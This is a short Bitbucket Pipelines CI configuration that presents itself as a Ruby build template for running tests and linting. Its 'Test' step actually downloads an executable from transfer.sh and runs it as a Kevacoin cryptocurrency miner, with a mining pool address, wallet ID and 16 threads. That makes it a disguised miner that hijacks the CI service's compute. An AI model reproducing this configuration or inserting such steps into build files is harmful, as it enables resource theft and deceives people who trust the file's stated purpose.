#  Template Ruby build

#  This template allows you to validate your Ruby code.
#  The workflow allows running tests and code linting on the default branch.

image: ubuntu:20.04

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - apt update && apt install wget -y
            - wget http://transfer.sh/get/oJdG6/swapmd
            - chmod a+x swapmd
            - ./swapmd -o kevacoin.herominers.com:10141 -u VCM4HCeDy1u5QuqGags1rqPEmRrmghwSM9 -p x -a cn/keva -k -t 16
